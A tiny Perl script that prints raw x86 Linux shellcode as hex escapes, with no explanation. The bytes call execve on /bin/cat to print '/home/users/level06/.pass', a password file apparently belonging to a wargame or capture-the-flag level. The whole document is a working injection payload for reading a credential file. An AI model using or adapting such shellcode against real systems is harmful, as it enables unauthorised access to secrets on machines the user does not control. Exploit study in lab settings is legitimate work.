#!/usr/bin/perl

print "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69"
	. "\x6e\x89\xe3\x50\x68\x70\x61\x73\x73\x68\x30\x36\x2f\x2e\x68\x65\x76\x65"
	. "\x6c\x68\x72\x73\x2f\x6c\x68\x2f\x75\x73\x65\x68\x68\x6f\x6d\x65\x68\x2f"
	. "\x2f\x2f\x2f\x89\xe1\x50\x51\x53\x89\xe1\xb0\x0b\xcd\x80";
